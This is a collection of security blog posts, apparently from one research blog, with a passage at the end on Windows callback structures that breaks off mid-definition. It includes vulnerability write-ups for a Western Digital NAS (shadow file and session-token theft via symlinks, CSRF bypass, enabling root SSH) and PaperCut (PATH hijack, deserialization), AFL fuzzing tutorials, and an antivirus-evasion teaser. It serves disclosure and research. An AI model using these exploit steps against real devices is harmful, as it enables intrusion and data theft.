In Habit 5 we are seeking to understand the pain points of the red team and blue team. We do this at Code42 by rotating team members into offensive and defensive roles on a regular cadence. When you are truly in someone else's shoes you can understand the challenges that they deal with on a daily basis. Adversaries often have to deal with collecting credentials, privilege escalation, and lateral movement. Waiting for callbacks and losing C2 can slow, or even eliminate their offensive capabilities. Defenders on the other hand have to deal with alert fatigue, looking through too much data, and the dread of “missing” some kind of adversary activity via a visibility gap. When each side understands the other’s pain points they can be much more effective at disrupting the attacker lifecycle, or the incident response lifecycle.

Habit 6: Together is better

Here is where the Purple team shines: each person has a unique background and perspective. If we are able to work together and approach defending our networks with a humble mentality we can learn from each other faster. Personally, I find it very rewarding when individuals have shared with me that they feel safe to ask questions about a technique, or technology. I’ve personally worked in places where that safety net isn’t there, and progress is slower. The key difference is a team that feels safe, is a team that can progress quite rapidly by learning from each other's strengths. Create an environment where it is safe to say, “I don't know”, and you will create an environment that frees itself to tap the knowledge of every individual on the team.

Habit 7: Renewal and Growth

I know after log4j we could all definitely use some renewal and restoration. Cybersecurity incidents can be a lot of work and they can be quite draining sometimes. Habit 7 is a challenge for me, I’m naturally driven and want to learn new things all the time. This is lucky because the cybersecurity landscape is ever-changing. Attacks and security implications of new technology are always evolving. One approach that is supportive to Habit 7 might be something like 20% time where anyone can choose a new and interesting topic that they want to research. That method can support each individual's need for growth. Having initiatives that support each individual’s well-being is an important component of a healthy team. At Code42 we did have in-person yoga classes (now remote), this can be challenging but don't forget to remind your team to take breaks during incidents, stretch, give their family or pets a hug, and be open to comping your team additional PTO if they work long days and weekends during an incident.

In closing, there are lots of ways where a Purple team model for cybersecurity operations supports the growth and development of a healthy and exceptional team. I hope some of these habits have sparked a desire to try a Purple team exercise in your organization.

CVE-2021–3310 Western Digital MyCloud PR4100 Link Resolution Information Disclosure Vulnerability

Pwn2own is something like the “academy awards” for exploits and like any good actor… or in this case hacker I dreamt of my chance on the red carpet... or something like that. I had previously made an attempt at gaining code execution for Pwn2own Miami and ended up finding some of the bugs that were used in the incite team's exploit of the Rockwell Studio 5000 logic designer. However, I couldn’t follow the path to full RCE. The incite team's use or abuse of XXE was pretty mind-bending!

So I patiently waited for the next event… finally, Pwn2own Tokyo 2020 was announced. I wanted another shot at the event so when the targets were released I wanted to focus on something practical and possible for me to exploit. I picked the Western Digital My Cloud Pro Series PR4100 device because I needed a NAS for my home network, it had lots of storage and was x86 based. Therefore if I needed to work on any binary exploitation I wouldn’t be completely lost.

Now that my target was chosen I needed to find a way to gain root access to the device.

NAS devices represent interesting targets because of the data that they hold, backups, photos, and other sensitive information. A brief review of previous CVEs affecting the Western Digital My Cloud lineup highlighted the fact that this device is already a target for security researchers and exploitation, as such, some of the low-hanging fruit had already been picked off. This included previous unauthenticated RCE vulnerabilities. Nevertheless, let's dive into the vulnerabilities that were chained together to achieve root-level access to the device.

The Vulnerabilities

AFP and SMB Default share permissions

Out of the box, the My Cloud ships with AFP and SMB file sharing enabled and 3 public file shares enabled. The web configuration states that public shares are only enabled when one or more accounts are created, however by default there is always an administrator account, so these shares are always enabled.

Default Share permissions

Diving into the share configuration we can see that for SMB guest access is enabled under the “nobody” account, thus requiring no authentication to access the shares. Since we have access to the share as “nobody”, we can read files, and create new files, provided the path gives us those permissions. We already have limited read and write primitives, awesome!

SMB.conf settings

Similarly, in the AFP configuration we can see that the “nobody” user is a valid user with permissions to the Public share Figure 3 Netatalk / AFP configuration.

AFP Configuration

Accessing the default folders doesn’t do us much good unless we can navigate the rest of the filesystem or store a web shell there. Digging deeper in the SMB configuration we find that following symlinks and wide links is enabled.

Symlinks enabled

We now have a vector by which to expose the rest of the filesystem. Let’s create some arbitrary symlinks to follow. After creating both symlinks to /etc/ and /temp/ we see something interesting. Apparently, the security configuration for /etc/shadow is overly permissive, and we can read the /etc/shadow file as a non-root user. #winning!

Access to the overly permissive shadow file readable by “nobody”

We can confirm this is the case by listing the permissions on the filesystem

insecure shadow file permissions

Typically, shadow files are readable only by the root user, with the permissions -rw-r — — such as in the example below

proper shadow file permissions

While its certainly impactful to gain access to a shadow file, we’d have to spend quite a bit of time trying to crack the password, even then it may not be successful. That’s not enough for us to get interactive access immediately (which is what pwn2own requires). We need to find a way to gain direct access to an admin session…

While navigating the /tmp directory via a symlink we can spot that the apache/php session path is thedefault “” which evaluates to the /tmp directory on Linux systems. We can validate that by checking the PHP configuration.

php default configuration / save path

Now we have a way to access the PHP session files, however, we can see that the file is owned by root and is ironically more secure than the /etc/shadow file. However, since the naming convention for the session file is still at its default and the sessions are not obfuscated in any way, the only important value is the filename which we can still read via our read primitive!

“secured” session file

Once we have leaked a valid session ID we can submit that to the website and see if we can get logged in.

Sending our request with the leaked cookie

After sending our request we find that the admin user is not logged in! We failed one final security check and that was for an XSRF token which the server generates after successful authentication. Since we aren’t authenticating the server doesn’t provide us with the token. Since most of the previous exploit attempts were directly against the web application several security checks have been implemented, the majority of PHP files on the webserver load login_checker.php which runs several security checks. Here the code for csrf_token_check() is displayed.

csrf_token_check with one fatal flaw

Reading the code, it appears that the check makes sure that WD-CSRF-TOKEN and X-CSRF-Token exist and are not empty. Finally, the check passes if $token_in_cookie equals token_in_header. This means all we must do is provide an arbitrary value and we can bypass the CSRF check!

The final attack then is to submit a request to the webserver to enable SSH with an arbitrary password. The URI at which we can do that is /cgi-bin/system_mgr.cgi

exploit attempt with leaked session token and CSRF bypass
The fruits of our labor, a root shell!

The Exploit

The techniques used in this exploit are intended to chain together several logical bugs with the PHP CSRF check bypass. The steps involved in this exploit are as follows.

1. Mount an AFP share on the target NAS’ Public directory

2. Mount an SMB share on the target NAS’ Public directory

3. Using the local AFP share create a symlink to /tmp in the directory

4. Navigate to the /public/tmp directory on the SMB share

5. Read a session ID value from the share (if an admins session token is still valid)

6. Use the session id in a web request to system_mgr.cgi to enable SSH access to the device with an arbitrary root password.

7. Leverage the CSRF bypass in the web request and use an arbitrary X-CSRF-Token and WD-CSRFToken values

The final result

What's the shelf life of an 0-day? Vulnerabilities are inherently a race condition between researchers and vendors, where bugs may get squashed intentionally, or unintentionally due to vendor patches, or it being discovered and disclosed by another researcher. In the case of this bug, the vendor released a patch 2 weeks before the competition, and the changes to the PHP code, validation of sessions, as well as updating PHP version squashed my exploit chain. I was still able to leverage the NFS / SMB bug to trigger a DOS condition due to a binary reading arbitrary files from an untrusted path. However, my RCE chain was gone and I couldn’t find another one in time for the event. Upon disclosing all of the details to ZDI they still decided to acquire the research even without RCE on the newest full release version of MyCloud OS. During the event, I enjoyed watching all of the other researchers submit their exploit attempts and I enjoyed the process of working with ZDI to get to acquisition and ultimately disclosure of the bugs. I’ll be back for a future pwn2own!

Finally, if you’d like to check out the exploit, my code is available on github.

Death By a Thousand Papercuts

Patch diffing major releases

From time to time our pentest team reviews software that we are either using or interested in acquiring. That was the case with Papercut, a multifunction printer/scanner management suite for enterprise printers. The idea behind Papercut is pretty neat, a user can submit a print job to a Papercut printer, and walk to any physical printer they are nearby and release the print job. Users don’t have to select from dozens of printers and hope they get the right one. Pretty neat! It does a lot of other stuff too, but you get the point, it’s for printing :)

Typically when starting an application security assessment I’ll start by searching for previous exploitable vulnerabilities released by other researchers. In the case of Papercut there was only one recent CVE I could find without much detail. CVE-2019–12135 stated “An unspecified vulnerability in the application server in Papercut MF and NG versions 18.3.8 and earlier and versions 19.0.3 and earlier allows remote attackers to execute arbitrary code via an unspecified vector.”

I don’t like unspecified vulnerabilities! However, this was a good opportunity to do some patch diffing, and general security research on the product. The purpose of this article will be to guide someone in attempting major release patch diffing to find an undisclosed or purposely opaque vulnerability.

Before diving into the patch diffing we also wanted to get an idea of how the application generally behaves.

Typically I’ll look for services and processes related to the target, and what those binaries try to load. Our first finding which was relatively easy to uncover was that the mobility-print.exe process attempts to load ps2pdf.exe, cmd, bat, and vbs from the windows PATH environment variable. As a developer its important to realize that this is something that could potentially be modified, which you have no control over. So loading arbitrary files from an untrusted path is not a good idea.

mobility-print.exe loading files from the PATH variable

After this finding we created a simple POC which spawned calc.exe from a path environment variable. In our case, a SQL server installation which was part of our Papercut install allowed for an unprivileged user to privilege escalate to SYSTEM due to F:\Program Files having the NTFS special permissions to write/append data.

POC bat file that spawns calc.exe
Calc.exe spawned as SYSTEM

First vulnerability down! That was easy, although it’s far from remote code execution… from the perspective of insider risk, a malicious insider with user level access to the print server could take over the print server with this vulnerability. We reported this vulnerability to Papercut and the newest release has this issue patched.

If you’ve done patch diffing of DLLs or binaries before, you know the important thing is to get the most recent version before the patch, and the version immediately after the patch. Typically a tool like BinDiff is used for comparing the patches. Unfortunately, Papercut doesn’t allow us to download a patch for their undisclosed RCE vulnerability, so the best we can do is download the point release before the vulnerability, and the point release with the patch. Unfortunately, that means that there will be a large number of updated files and the patch will be difficult to find. I made an educated guess that the remote code execution vulnerability would be an insecure deserialization vulnerability simply based on the fact that there were a lot of jar files included in the installer. The image below shows a graphical diffing view of the Papercut folder structure. The important thing here is that purple represents files that have been added.

Here we see a lot of class files added that didn’t exist before… with a lot of extraneous data filtered out.

After diffing the point release and seeing that SecureSerializationFilter was added to the codebase, the next step we took was to see where the new class is leveraged (hint it’s during serialization and deserialization of print jobs). With this information we can craft an attack payload against unpatched versions in the form of a print job.

Finally looking at the class path of the server we can see that Apache Commons Collection is included, so a Ysoserial payload should work for achieving RCE. We’ve achieved the goal of understanding the underlying root cause of the vulnerability even though the vendor did not provide any useful information in understanding the issue. But in a perfect world the vendor would have shared this information in the first place!

As a side note Papercut is one of many vendors who leverage third party libraries. MFP software represents an interesting target in that there are typically large numbers of file format parsers involved in translating image file formats and office document file formats into a format that many printers understand. Third party libraries often are leveraged for this and some may not be as vetted or secure when compared to a Microsoft developed library.

Why you DON’T need the OSCP to land a cybersecurity job in 2020

(or any other security certifications for that matter)

Often when I’m approached by individuals trying to get started in infosec I’ll be asked some variant of the question “What certification should I get to land a job in Cybersecurity?” or “Is the OSCP good/bad/hard/worth-it/insert-adjective-here?” Some people get psyched out before they even start, and convince themselves it will be too hard for them (it’s not). As someone who has taken the OSCP and many other exams, I will tell you that you don’t need it. Or any other exam for that matter in order to get a job in infosec. There I said it, go ahead and rescind my CISSP while you still can!

Before I dive into reasons that the OSCP is not needed I'll go further to say that it is one of the best cybersecurity certifications. If that seems counterintuitive then please read on. OSCP is one of the best simply because it is a hands-on course and a hands-on exam. As such it is a great proxy for real-world experience. If you think critically about certification companies for a moment and think about why a certification or certification exists, it should be to create content that can educate or highlight the strength of a potential candidate's skills and expertise. However, oftentimes certifying bodies are rather self-serving or even predatory with their high cost to “maintain” a certification. Certification companies often market themselves as a way to land a job. Spoiler alert, no one cares if you have a CE|H. Offensive Security, however, does not charge maintenance fees, yet again, another win for Offensive Security, and since the exam and labs are hands-on, students can't help but learn something!

While I feel strongly that offensive security does an acceptable job of highlighting applicant skills with a practical hands-on certification, the fact is that the infosec space has changed drastically compared to when I got my certification 7 years ago, and certifications are no longer as relevant as they used to be. For one the bug bounty space has really matured and I’m happy to see so many vendors establishing positive relationships with the security community. There is still a lot of growth left in the bug bounty space and it’s a great potential avenue to highlight your skills.

One example of highlighting skills is the HackerOne hacktivity feed https://hackerone.com/hacktivity.

Your name here!

So instead of highlighting your certifications, you can highlight your real-world accomplishments on platforms like HackerOne. Alternatively, there are some vulnerability acquisition platforms that are private in nature but do allow crediting researchers with the vulnerabilities. Generally, these are top-tier vulnerability acquisition platforms like ZDI. Personally I’d love to hire someone who has been to a PWN2OWN competition and value experience like that much higher than certifications

Other bug bounty programs have private feeds, but you can certainly share your ranking on those platforms if you are under NDA for the specific vulnerabilities you find.

Finally, I believe the role of a certifying body is to follow industry trends and ensure that the course offerings match what the industry is looking for. Again the Offensive Security team does better than most in preparing a student to achieve great things in the security space but certifications are not exactly what the industry is looking for. Thankfully companies will happily tell you what they are really looking for in the “nice to have” section of job descriptions.

Job Description for an offensive role with Cylance
NCC group
Nvidia

Many offensive cybersecurity roles would really like to see CVE’s attributed to an applicant’s name. CVE’s demonstrate real-world impact and the level of skill of the applicant. Similar to bug bounty programs, an applicant is able to demonstrate their security expertise and help to make the world a safer place.

If hunting for CVE’s doesn’t sound appealing another alternative would be demonstrating your software development experience by open sourcing some tool or contributing to an existing open-source security tool. A memorable example was one applicant at a former job wrote a scanner in python that looked for meterpreter specific strings in memory. His CTF team used the script to help defend systems at CCDC events that they competed in. Definitely a cool application of tech to solve a painful problem for CCDC blue teams.

So is the OSCP worthless then? Far from it, I am grateful for my experiences in the labs. I enjoyed the pain so much I went on to take my OSCE and am waiting for an exam opportunity for my OSWE certification. I’d recommend that someone takes the exam if they are looking for some new experiences and hopefully some new knowledge. If someone is looking for a job in infosec and the price of training and the certification is too high, there are now plenty of free ways to demonstrate your experience, or even better, ways to get paid to demonstrate your experience.

Fuzzing for known vulnerabilities with Rode0day pt 2

Improving fuzzer code coverage

This is a follow on post to my first article where we went over setting up the American Fuzzy Lop fuzzer (AFL)written by Michał Zalewski. When we previously left off our fuzzer was generating test cases for the Rode0day beta binary buffalo.c available here. However we quickly found out that the supplied input file didn’t appear to be enough to generate many code paths. Meaning we weren’t testing many new instruction sets or components of the application. A very simple explanation of a code path can be found here.

Unfortunately for us the challenge provided an arbitrary file parser for us to fuzz, in the case of fuzzing something like a pdf parser we would have a large corpus available to us out on the internet to download and start fuzzing with. In the case of fuzzing something like the PDF file format you wouldn’t even need to understand anything about the file format to begin fuzzing!

Yet another setback is that there is no documentation, most standardized file formats follow a spec, such that there will be interoperability between different applications opening the same file. This is why you can read a pdf file in your web browser, adobe reader, foxit reader etc. If you are interested the pdf spec is available here.

While we don’t have the spec for the buffalo file format parser we do have the C source code available, which is the next best thing. I am not an experienced C developer but looking at the source code for a few minutes and a few things become apparent. At a number of lines we can see that there are multiple calls to printf:

Calls to printf everywhere!

Printf can be used in unsafe ways to leak data from the stack, or worse. In this case it doesn’t look immediately exploitable, but our fuzzing will help us determine if that is the case or not.

Use of an unsafe function printf

Here printf is printing the string “file timestamp” then printing an unsigned decimal (unsigned int) head.timestamp. “head timestamp” appears to be part of an element in the data_flow array.

Nevertheless the point of this challenge is to fuzz the binary not reverse engineer it. For the purpose of the challenge we would want to understand what kind of input the program is expecting to parse. While reading the beginning of the source code two things immediately stand out. The format for the file_header is described as well as the file_entry struct

here the file_header and file_entry structs are defined

Then we see that like a lot of file formats the program checks to see if there is a specific file format header or “magic bytes” when beginning to parse the file.

our magic byte checker

here the value in int v829383 is set to 0x4c415641. If the 0x41 looks familiar thats good because that is letter “A” in ASCII. Thus the magic bytes in ASCII is the string “LAVA” so based on this information we can say that the contest organizers didn’t even give us a file format that can be fully parsed by the application! let’s create some valid files!

creating a few POC files
more paths!

Once we point AFL to our corpus directory and start another fuzzing run we immediately see new paths being explored by AFL. In the prior blog post after running AFL for some time there were only 2 paths explored. This would make sense because after examining the source code we discovered that the sample file provided to us would immediately get rejected by the program since it didn’t have the correct magic bytes. So beforehand the only path we explored was the magic byte check in the code, then no other paths were explored.

Diving deeper into the code we can work on writing an input file with a proper file_header and file_entry structs such that we would exercise the normal code paths of the application and not the error handling paths. Below i’ve copied the struct code and added the strings that I think will match what the structs are expecting.

typedef struct {
uint32_t magic; =“AVAL”
uint32_t reserved; = “AAAA”
uint16_t num_recs; = “AA”
uint16_t flags; = “AA”
uint32_t timestamp; “AAAA”
} file_header;
typedef struct {
char bar[16]; = “DDDDDDDDDDDDDDDDDD”
uint32_t type; = “AAAA”
union {
float fdata; "0.0"
uint32_t intdata; "1"
} data; "data"
} file_entry;

based on the struct definitions something like:

echo “AVALAAAAAAAAAAAADDDDDDDDCCCCCCCCAAAAAAAA” > ./samples/test.poc

should create a file that parses and it does to a certain extent.

our file parses but generates an unknown type error

The above file would be great to add to a sample corpus, using the source code as our guide we can create a number of additional input files to test new code paths. I spent some time working to create additional sample files with quite a bit of success in discovering new paths. Compared with the original post I was able to uncover 127 total code paths in a few hours of fuzzing.

Now we are running a reliable fuzzer that tests a number of code paths

If you’d like some hints on what other input files to provide to the application I’ve included a number of input files here. Be warned there are a number of crashing inputs to the binary so you will have to remove them before AFL will begin the run. Good luck and happy fuzzing!

Fuzzing for known vulnerabilities with Road0Day & LAVA

Fuzzing for known vulnerabilities with Rode0day & LAVA

It might seem strange to want to spend time and resources looking for known vulnerabilities. That is the case with the Rode0day competition in which seeded vulnerabilities are injected into binaries with the tool LAVA. If you stop and think for a moment on the challenges of fuzzing and vulnerability discovery, one of the primary challenges is an inability to know if your fuzzing technique is effective. One might infer that if you find a lot of unique crashes, in different code paths then your fuzzing strategy is effective… or was the code just poorly written? If you find no crashes, or very few, is your fuzzing strategy not working properly? Is the program just handling malformed input well? These questions are difficult to answer and as a result it can be difficult to know if you are wasting resources or if it’s just a matter of time before you’d find a vulnerability.

Enter Large-scale Automated Vulnerability Addition(LAVA) which aims to automate injection of buffer overflow vulnerabilities in an automated way while ensuring that the bugs are security critical, reachable from user input, and plentiful. The presentation is very interesting and I highly recommend watching the full video. TLDR; the LAVA developers injected 2000 flaws in a binary and an open source fuzzer & symbolic execution tool found less than 2% of the bugs! It should however be noted that their were purely academic, and the fuzzing runs were relatively short. With an unsophisticated approach low detection rates are to be expected.

In the Rode0day Competition challenge binaries are released every month. The challenges are available with source code so it’s possible to compile them with binary instrumentation to get started (relatively) quickly. So let’s get started with one of the prior challenges to get a fuzzer setup. For the purposes of the competition, AFL will be our go to fuzzer. I’ll be using an instance in AWS ec2 running ubuntu 18.04 and in this case AFL is available in the apt repo so first run:

$sudo apt-get install afl

once AFL is installed we can grab a target binary from the competition

$wget https://rode0day.mit.edu/static/archive/Beta.tar.gz
$tar -zxvf Beta.tar.gz

I chose to start with the beta challenges however you can choose any challenge from the list. Reading the info.yaml file that’s included describes the challenge and the first challenge “buffalo” looks like a good one to start with since it takes one argument from the command line directly.

contents of the info.yaml file

Next we want to compile the target binary for AFL instrumentation, but before we can do that let’s see if it will compile without modifications:

our target binary compiles with warnings

Even though there were warnings the binary does compile and we have the same functionality between our compiled binary and the included binary. We should be ready to start fuzzing with AFL, let’s compile with instrumentation. we can use afl-gcc directly, or modify the Makefile.

ubuntu@ip-172–31–47–47:~/rode0day/beta/src/1$ afl-gcc buffalo.c -o aflbuffalo
our binary compiles with afl-gcc

Next we can review the included input corpus for our buffalo which in this case, is nowhere near as exciting as say, a corpus of jpegs.

hexdump of our input sample file, looks like a few 0x41’s or A’s and thats it

Our corpus contains only one file which has A’s and not much else, not very exciting…

so we can launch AFL with the command:

afl-fuzz -i ../../test/ -o ./crashes/ ./aflbuffalo @@

where -i is the input directory containing our input files, -o is the output directory to store our crashes ./aflbuffalo is the compiled program to test and @@ simple means append the input files to the command line.

afl running against our instrumented binary.

After letting the fuzzer run for some time with only one input file in AFL we wont end up seeing total paths increase significantly, which means we are not exploring and testing new code paths. Adding just one new file to the input directory resulted in another code path being hit. This points to the overall importance of having a large, but efficient corpus. I’ll have a follow-up blog post about creating a corpus for this challenge binary.

If you liked this blog post, more are available on our blog redblue42.com

Statically encrypt strings in a binary with Keystone, LIEF and radare2/rizin

By: plowsec
11 April 2022 at 10:09
In our journey to try and make our payload fly under the radar of antivirus software, we wondered if there was a simple way to encrypt all the strings in a binary, without breaking anything. We did not find any satisfying solution in the literature, and the project looked like a fun coding exercise so … Continue reading Statically encrypt strings in a binary with Keystone, LIEF and radare2/rizin

Windows Data Structures and Callbacks, Part 1

By: odzhan
6 August 2020 at 20:20

Windows Data Structures and Callbacks, Part 1

Contents

  1. Introduction
  2. Function Table List
  3. Event Tracing
  4. DLL Notifications
  5. Secure Memory
  6. Configuration Manager (CM)
  7. Vectored Exception Handling (VEH)
  8. Windows Error Reporting (WER)

1. Introduction

A process can contain thousands of pointers to executable code, some of which are stored in opaque, but writeable data structures only known to Microsoft, a handful of third party vendors and of course bad guys that want to hide malicious code from memory scanners. This post documents what some of the data structures contain rather than PoCs to demonstrate code redirection or evasion, which I probably won’t discuss much anymore. The names of some structure fields won’t be entirely accurate, but feel free to drop me an email if you think something needs correcting. No, I don’t have access to source code. These structures were reverse engineered or can be found on MSDN.

2. Dynamic Function Table List

ntdll!RtlpDynamicFunctionTable contains DYNAMIC_FUNCTION_TABLE entries and callback functions for a range of memory that can be installed using ntdll!RtlInstallFunctionTableCallback. ntdll!RtlGetFunctionTableListHead returns a pointer to the list and since NTDLL.dll uses the same base address for each process, you can read entries from a remote process very easily.

typedef enum _FUNCTION_TABLE_TYPE {
    RF_SORTED,
    RF_UNSORTED,
    RF_CALLBACK
} FUNCTION_TABLE_TYPE;

typedef PRUNTIME_FUNCTION (CALLBACK *PGET_RUNTIME_FUNCTION_CALLBACK)
  (ULONG_PTR ControlPc, PVOID Context);
    
typedef struct _DYNAMIC_FUNCTION_TABLE {
    LIST_ENTRY                      Links;
    DWORD64                         TableIdentifier;
    LARGE_INTEGER                   TimeStamp;
    DWORD64                         MinimumAddress;
    DWORD64                         MaximumAddress;
    PVOID                           BaseAddress;
    PGET_RUNTIME_FUNCTION_CALLBACK  Callback;
    PCWSTR                          OutOfProcessCallbackDll;
    FUNCTION_TABLE_TYPE             Type;
    ULONG                           EntryCount;
    ULONG64                         UnknownStruct[3];  // referenced by RtlAvlInsertNodeEx         
} DYNAMIC_FUNCTION_TABLE, *PDYNAMIC_FUNCTION_TABLE;

3. Event Tracing

Microsoft recommends against using it, but sechost!SetTraceCallback can still receive ETW events. Entries of type EVENT_CALLBACK_ENTRY are located at sechost!EtwpEventCallbackList.

typedef VOID (CALLBACK PEVENT_CALLBACK)(PEVENT_TRACE pEvent);

ULONG WMIAPI SetTraceCallback(
    LPCGUID         pGuid,
    PEVENT_CALLBACK EventCallback);

typedef struct _EVENT_CALLBACK_ENTRY {
    LIST_ENTRY      ListHead;
    GUID            ProviderId;
    PEVENT_CALLBACK Callback;
} EVENT_CALLBACK_ENTRY, *PEVENT_CALLBACK_ENTRY;

4. DLL Notifications

It’s possible to receive notifications about a DLL being loaded or unloaded using ntdll!LdrRegisterDllNotification. It’s used to hook API for Common Language Runtime (CLR) in ClrGuard. Entries of type LDR_DLL_NOTIFICATION_ENTRY can be located at ntdll!LdrpDllNotificationList.

typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STRING FullDllName;       // The full path name of the DLL module.
    PUNICODE_STRING BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_LOADED_NOTIFICATION_DATA, *PLDR_DLL_LOADED_NOTIFICATION_DATA;

typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STRING FullDllName;       // The full path name of the DLL module.
    PUNICODE_STRING BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, *PLDR_DLL_UNLOADED_NOTIFICATION_DATA;

typedef VOID (CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)(
    ULONG                       NotificationReason,
    PLDR_DLL_NOTIFICATION_DATA  NotificationData,
    PVOID                       Context);
    
typedef union _LDR_DLL_NOTIFICATION_DATA {
    LDR_DLL_LOADED_NOTIFICATION_DATA   Loaded;
    LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, *PLDR_DLL_NOTIFICATION_DATA;

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, *PLDR_DLL_NOTIFICATION_ENTRY;

typedef NTSTATUS(NTAPI *_LdrRegisterDllNotification) (
    ULONG                          Flags,
    PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
    PVOID                          Context,
    PVOID                          *Cookie);
    
typedef NTSTATUS(NTAPI *_LdrUnregisterDllNotification)(PVOID Cookie);

5. Secure Memory

Kernel drivers can secure user-space memory using ntoskrnl!MmSecureVirtualMemory. This prevents the memory being freed or having its page protection made more restrictive. i.e PAGE_NOACCESS. To monitor changes, developers can install a callback using AddSecureMemoryCacheCallback. Entries of type RTL_SEC_MEM_ENTRY are located at ntdll!RtlpSecMemListHead.

typedef BOOLEAN (CALLBACK *PSECURE_MEMORY_CACHE_CALLBACK)(PVOID, SIZE_T);

typedef struct _RTL_SEC_MEM_ENTRY {
    LIST_ENTRY                    Links;
    ULONG                         Revision;
    ULONG                         Reserved;
    PSECURE_MEMORY_CACHE_CALLBACK Callback;
} RTL_SEC_MEM_ENTRY, *PRTL_SEC_MEM_ENTRY;

6. Configuration Manager (CM)

A process can register for Plug and Play events using cfgmgr32!CM_Register_Notification. Microsoft recommends legacy systems up to Windows 7 use RegisterDeviceNotification, but I didn’t examine that function. Notification entries of type _HCMNOTIFICATION are located at cfgmgr32!EventSystemClientList. _CM_CALLBACK_INFO is the structure sent to \Device\DeviceApi\CMNotify when a process registers a callback. As you can see from the WnfSubscription field, it uses the Windows Notification Facility (WNF) to receive events.

typedef DWORD (CALLBACK *PCM_NOTIFY_CALLBACK)(
    _In_     HCMNOTIFICATION       hNotify,
    _In_opt_ PVOID                 Context,
    _In_     CM_NOTIFY_ACTION      Action,
    _In_     PCM_NOTIFY_EVENT_DATA EventData,
    _In_     DWORD                 EventDataSize);
    
typedef struct _CM_CALLBACK_INFO {
    WCHAR              ModulePath[MAX_PATH];
    CM_NOTIFY_FILTER   EventFilter;
};

typedef struct _tagHCMNOTIFICATION {
    USHORT                  Signature;             // 0xF097
    SRWLOCK                 SharedLock;
    CONDITION_VARIABLE      ConditionVar;
    LIST_ENTRY              EventSystemClientList;
    LIST_ENTRY              EventSystemPendingClients;
    BOOL                    Active;
    BOOL                    InProgress;
    CM_NOTIFY_FILTER        EventFilter;
    PCM_NOTIFY_CALLBACK     Callback;
    PVOID                   Context;
    HANDLE                  NotifyFile;    // handle for \Device\DeviceApi\CMNotify
    PWNF_USER_SUBSCRIPTION  WnfSubscription;
    LIST_ENTRY              Links;
} _HCMNOTIFICATION, *_PHCMNOTIFICATION;

7. Vectored Exception Handling (VEH)

When kernelbase!KernelBaseBaseDllInitialize is executed, it installs an exception handler kernelbase!UnhandledExceptionFilter via SetUnhandledExceptionFilter. Unless a Vectored Exception Handler (VEH) is installed afterwards, this is the top level handler executed for any faults that occur. VEH callbacks installed using AddVectoredExceptionHandler or AddVectoredContinueHandler are located at ntdll!LdrpVectorHandlerList

// vectored handler list
typedef struct _RTL_VECTORED_HANDLER_LIST {
    SRWLOCK                    Lock;
    LIST_ENTRY                  List;
} RTL_VECTORED_HANDLER_LIST, *PRTL_VECTORED_HANDLER_LIST;

// exception handler entry
typedef struct _RTL_VECTORED_EXCEPTION_ENTRY {
    LIST_ENTRY                  List;
    PULONG_PTR                  Flag;           // some flag related to CFG
    ULONG                       RefCount;
    PVECTORED_EXCEPTION_HANDLER VectoredHandler;
} RTL_VECTORED_EXCEPTION_ENTRY, *PRTL_VECTORED_EXCEPTION_ENTRY;  

8. Windows Error Reporting (WER)

Windows provides API to enable application recovery, dumping process memory and generating reports via the WER service. WER settings for a process can be located within the Process Environment Block (PEB) at WerRegistrationData.

8.1 PEB Header Block

I’ll discuss structures separately, but for the few that aren’t. Signature is set internally by kernelbase!WerpInitPEBStore and simply contains the string “PEB_SIGNATURE”. AppDataRelativePath is set by WerRegisterAppLocalDump. kernelbase!RegisterApplicationRestart can be used to set RestartCommandLine, which is used as the command line when the process is to be eh..restarted. 🙂

typedef struct _WER_PEB_HEADER_BLOCK {
    LONG                 Length;
    WCHAR                Signature[16];
    WCHAR                AppDataRelativePath[64];
    WCHAR                RestartCommandLine[RESTART_MAX_CMD_LINE];
    WER_RECOVERY_INFO    RecoveryInfo;
    PWER_GATHER          Gather;
    PWER_METADATA        MetaData;
    PWER_RUNTIME_DLL     RuntimeDll;
    PWER_DUMP_COLLECTION DumpCollection;
    LONG                 GatherCount;
    LONG                 MetaDataCount;
    LONG                 DumpCount;
    LONG                 Flags;
    WER_HEAP_MAIN_HEADER MainHeader;
    PVOID                Reserved;
} WER_PEB_HEADER_BLOCK, *PWER_PEB_HEADER_BLOCK;

8.2 Recovery Information

A recovery callback can be installed using kernel32!RegisterApplicationRecoveryCallback. kernelbase!GetApplicationRecoveryCallback will read the Callback, Parameter, PingInterval and Flags from a remote process. kernel32!ApplicationRecoveryFinished can read if the Finished event is signalled. ApplicationRecoveryInProgress will determine if the InProgress event is signalled. Started is a handle, but I’m unsure what it’s for exactly.

typedef struct _WER_RECOVERY_INFO {
    ULONG                Length;
    PVOID                Callback;
    PVOID                Parameter;
    HANDLE               Started;
    HANDLE               Finished;
    HANDLE               InProgress;
    LONG                 LastError;
    BOOL                 Successful;
    DWORD                PingInterval;
    DWORD                Flags;
} WER_RECOVERY_INFO, *PWER_RECOVERY_INFO;

8.3 Gathers

As part of a report created by WER, kernelbase!WerRegisterMemoryBlock inserts information about a range of memory that should be included. It’s also possible to exclude a range of memory using kernelbase!WerRegisterExcludedMemoryBlock, which internally sets bit 15 of the Flags in a WER_GATHER structure. Files that might otherwise be excluded from a report can also be saved via kernelbase!WerRegisterFile.

typedef struct _WER_FILE {
    USHORT               Flags;
    WCHAR                Path[MAX_PATH];
} WER_FILE, *PWER_FILE;

typedef struct _WER_MEMORY {
    PVOID                Address;
    ULONG                Size;
} WER_MEMORY, *PWER_MEMORY;

typedef struct _WER_GATHER {
    PVOID                Next;
    USHORT               Flags;    
    union {
      WER_FILE           File;
      WER_MEMORY         Memory;
    } v;
